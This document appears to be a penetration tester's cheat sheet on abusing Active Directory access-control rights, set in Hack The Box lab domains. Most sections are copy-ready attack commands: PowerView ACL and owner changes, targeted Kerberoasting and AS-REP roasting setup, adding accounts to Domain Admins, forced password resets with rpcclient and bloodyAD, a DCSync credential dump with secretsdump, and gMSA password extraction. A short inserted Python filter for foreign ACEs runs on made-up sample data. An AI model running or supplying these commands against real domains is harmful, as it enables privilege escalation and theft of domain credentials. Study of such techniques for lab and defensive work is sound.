# Abuse ACLS

{% hint style="info" %}
Computer accounts are also user accounts: they can query LDAP like any other user, interact with ACLs, and run the BloodHound ingestor.
{% endhint %}

### Methods

* **ForceChangePassword** abused with `Set-DomainUserPassword`
* **AddMembers** abused with `Add-DomainGroupMember`
* **GenericAll** abused with `Set-DomainUserPassword` or `Add-DomainGroupMember`
* **GenericWrite** abused with `Set-DomainObject`
* **WriteOwner** abused with `Set-DomainObjectOwner`
* **WriteDACL** abused with `Add-DomainObjectACL`
* **AllExtendedRights** abused with `Set-DomainUserPassword` or `Add-DomainGroupMember`

### ACLs enumeration

```powershell
# PowerShell AD module cmdlets (manual mode, more evasive than PowerView)
PS C:\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
PS C:\htb> foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}

# Performing a reverse search: mapping a rightsGuid value back to its extended right
# (this GUID is User-Force-Change-Password)
PS C:\htb> $guid= "00299570-246d-11d0-a768-00aa006e0529"
PS C:\htb> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * | Select Name,DisplayName,DistinguishedName,rightsGuid | ?{$_.rightsGuid -eq $guid} | fl
```

### Enumerate ACLs for specific User

```powershell
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $sid = Convert-NameToSid rita
PS C:\Tools> Get-DomainObjectAcl -ResolveGUIDs -Identity * -domain inlanefreight.ad | ? {$_.SecurityIdentifier -eq $sid}
```

### Abuse Foreign Groups

As a rule, try to identify users that belong to foreign groups, then check those groups' permissions and nested groups. This may allow lateral movement to the parent domain.

Example 1:

User Intrusionz3r0 belongs to the foreign group "foreign\_admins", which in turn is a member of the Account Operators group on the parent domain controller. As a result, Intrusionz3r0 can create a user on the parent domain and add it to powerful groups (e.g. DNSAdmins).

Tools

* Bloodhound
* Powerview

### Enumerate Foreign Users

```powershell
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainForeignUser
```

### Find Foreign ACLs across all users within the domain

```powershell
$Domain = "domain.local"
$DomainSid = Get-DomainSid $Domain

# Keep only allow ACEs granting write-class rights to a non-built-in principal (RID >= 1000)
# whose SID does not belong to this domain
Get-DomainObjectAcl -Domain $Domain -ResolveGUIDs -Identity * | ? {
	($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner') -and `
	($_.AceType -match 'AccessAllowed') -and `
	($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and `
	($_.SecurityIdentifier -notmatch $DomainSid)
}
```
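The same filter re-implemented in Python as an added example (not the page's own code), run over constructed ACE records shaped like `Get-DomainObjectAcl` output; the domain SIDs and DNs are made up:

```python
import re
from dataclasses import dataclass

# Same patterns as the PowerView filter: rights that let the trustee rewrite the
# object (attributes, membership, DACL or owner) ...
DANGEROUS_RIGHTS = re.compile(r"WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner", re.I)
# ... held by a domain SID whose RID is >= 1000, i.e. a principal created in some
# domain rather than a built-in or well-known account (RID < 1000)
NON_BUILTIN_SID = re.compile(r"^S-1-5-.*-[1-9]\d{3,}$")

@dataclass(frozen=True)
class Ace:
    object_dn: str   # ObjectDN of the AD object carrying the ACE
    rights: str      # ActiveDirectoryRights as PowerView prints it, e.g. "WriteProperty, ExtendedRight"
    ace_type: str    # AceType: AccessAllowed, AccessAllowedObject, AccessDenied, ...
    sid: str         # SecurityIdentifier of the trustee

def is_foreign_dangerous(ace: Ace, domain_sid: str) -> bool:
    """True when a principal from outside domain_sid holds a write-class right on the object."""
    return (DANGEROUS_RIGHTS.search(ace.rights) is not None
            and "AccessAllowed" in ace.ace_type      # -match 'AccessAllowed' also hits AccessAllowedObject
            and NON_BUILTIN_SID.match(ace.sid) is not None
            and domain_sid not in ace.sid)           # -notmatch $DomainSid

def find_foreign_aces(aces, domain_sid):
    return [a for a in aces if is_foreign_dangerous(a, domain_sid)]

# Constructed sample (not real data): our domain SID, a second domain, and six ACEs
OUR_DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
OTHER_DOMAIN = "S-1-5-21-4444444444-5555555555-6666666666"
USER_DN = "CN=rita,CN=Users,DC=domain,DC=local"
GROUP_DN = "CN=Backup_Admins,CN=Users,DC=domain,DC=local"
SAMPLE_ACES = [
    Ace(USER_DN, "GenericAll", "AccessAllowed", OUR_DOMAIN + "-1104"),        # local principal: skipped
    Ace(USER_DN, "GenericAll", "AccessAllowed", "S-1-5-32-544"),              # BUILTIN\Administrators: skipped
    Ace(USER_DN, "ReadProperty", "AccessAllowed", OTHER_DOMAIN + "-1105"),    # foreign but read-only: skipped
    Ace(GROUP_DN, "WriteDacl", "AccessDenied", OTHER_DOMAIN + "-1105"),       # deny ACE: skipped
    Ace(GROUP_DN, "WriteProperty, ExtendedRight", "AccessAllowedObject", OTHER_DOMAIN + "-1105"),  # reported
    Ace(USER_DN, "WriteOwner", "AccessAllowed", OTHER_DOMAIN + "-2010"),      # reported
]

def demo():
    return find_foreign_aces(SAMPLE_ACES, OUR_DOMAIN)

if __name__ == "__main__":
    for ace in demo():
        print(f"{ace.sid} has {ace.rights} on {ace.object_dn}")
```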

### Abusing Foreign Security Principals & ACLs

```powershell
# Enumerate Foreign Security Principals
PS C:\Tools> Get-DomainObject -LDAPFilter '(objectclass=ForeignSecurityPrincipal)' -Domain logistics.ad

# Enumerate foreign members of groups in the domain
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainForeignGroupMember -Domain logistics.ad
```

### Convert SID to name and vice versa

```powershell
#Convert SID to name
PS C:\Tools> ConvertFrom-SID S-1-5-21-2432454459-173448545-3375717855-3601

#Convert name to SID
PS C:\Tools> ConvertTo-SID Intrusionz3r0
```

### Need Credentials?

```powershell
$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
```

### GenericAll Rights on User

```powershell
# Add a fake SPN to the target so the account becomes Kerberoastable
Set-DomainObject -Credential $Cred -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}

# Targeted Kerberoast
.\Rubeus.exe kerberoast /user:<username> /nowrap
impacket-GetUserSPNs megacorp.local/sbauer:'D3veL0pM3nT!' -request

# Disable Kerberos pre-authentication (DONT_REQ_PREAUTH = 0x400000) for AS-REP roasting
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
```

### GenericAll Rights on Group

```bash
# From a Windows host
net group "domain admins" <username> /add /domain
Add-ADGroupMember -Identity "domain admins" -Members <username>

# From Linux with bloodyAD
bloodyAD -u Thomas.Powell -p 'Password123!' --dc-ip 10.10.65.121 add groupMember 'admsvc' 'Thomas.Powell'
```

### GenericWrite on Computer

* Shadow Credentials (Windows Server 2016 or later; the DC must support PKINIT)
* Resource-Based Constrained Delegation (Windows Server 2012 onwards)
* Write `unicodePwd` to change the machine password

```sh
❯ bloodyAD -u 'FS01$' -p 'password123' -d retro2.vl --dc-ip 10.10.120.69 set password 'ADMWS01$' 'Password123'
[+] Password changed successfully!
```

### GenericWrite on User

Targeted Kerberoasting (the account's password must be weak enough to be cracked offline)

```sh
❯ python3 targetedKerberoast.py -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' --request-user 'N.Thompson'
```

### WriteOwner Rights on User

```powershell
# Take ownership, grant yourself ResetPassword on the object, then reset the password
PS C:\> Set-DomainObjectOwner -Identity claire -OwnerIdentity Tom -Verbose
PS C:\> Add-DomainObjectAcl -TargetIdentity Claire -PrincipalIdentity Tom -Rights ResetPassword -Verbose
PS C:\> Set-DomainUserPassword -Identity Claire -AccountPassword (ConvertTo-SecureString 'Password1!' -AsPlainText -Force) -Verbose
```

### WriteDACL Rights on Group

```powershell
# Grant full rights on the group to claire, then add her as a member
Add-DomainObjectAcl -TargetIdentity Backup_Admins -PrincipalIdentity claire -Rights All -Verbose
Add-ADGroupMember -Identity "Backup_Admins" -Members claire -Verbose
```

### ForceChangePassword on User

{% hint style="info" %}
If the computer account has permission to change the password, just authenticate to that machine as any user, import PowerView and make the change.
{% endhint %}

```bash
# PowerView
Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

# From Linux with rpcclient (info level 23 sets a new password)
rpcclient -U KnownUsername 10.10.10.192
> setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!'
```

### [DCSync] DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on Domain Controller

```bash
impacket-secretsdump svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175 -just-dc-user Administrator
```

### ReadGMSAPassword <a href="#readgmsapassword" id="readgmsapassword"></a>

```sh
bloodyAD --host 192.168.210.15 -d domain.local -u 'COMPUTERNAME$' -p :24039a7fd44d8decdxxxxxxxc06 get object 'TARGET' --attr msDS-ManagedPassword
gMSADumper.py -u 'user' -p 'password' -d 'domain.local'
```

### References

[Abusing Active Directory ACLs/ACEs | HackTricks](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#forcechangepassword)
